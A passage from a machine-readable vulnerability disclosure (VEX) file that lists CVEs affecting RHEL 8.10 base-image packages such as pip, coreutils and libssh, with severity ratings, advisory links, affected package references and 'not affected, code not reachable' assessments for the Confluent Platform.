              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5278",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121
      ],
      "description": "A flaw was found in GNU Coreutils. The sort utility's begfield() function is vulnerable to a heap buffer under-read. The program may access memory outside the allocated buffer if a user runs a crafted command using the traditional key format. A malicious input could lead to a crash or leak sensitive data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5278"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/27/2"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/29/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/29/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28911"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33124"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33612"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34102"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39981"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44481"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:46836"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50205"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5278"
        },
        {
          "url": "https://bugzilla.redhat.com/2368764"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2368764"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/commit/?id=8c9602e3a145e9596dc1a63c6ed67865814b6633"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/tree/NEWS?id=8c9602e3a145e9596dc1a63c6ed67865814b6633#n14"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5278"
        },
        {
          "url": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=78507"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-33124.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28911"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-5278.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-33124.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5278"
        },
        {
          "url": "https://security-tracker.debian.org/tracker/CVE-2025-5278"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5278"
        }
      ],
      "published": "2025-05-27T21:15:23+00:00",
      "updated": "2026-08-19T02:16:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.30-17.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5351",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        415
      ],
      "description": "A flaw was found in the key export functionality of libssh. The issue occurs in the internal function responsible for converting cryptographic keys into serialized formats. During error handling, a memory structure is freed but not cleared, leading to a potential double free issue if an additional failure occurs later in the function. This condition may result in heap corruption or application instability in low-memory scenarios, posing a risk to system reliability where key export operations are performed.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5351"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5351"
        },
        {
          "url": "https://bugzilla.redhat.com/2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-18683.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-5351.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5351"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7619-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5351"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2025-5351.txt"
        }
      ],
      "published": "2025-07-04T09:15:37+00:00",
      "updated": "2026-06-30T11:16:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
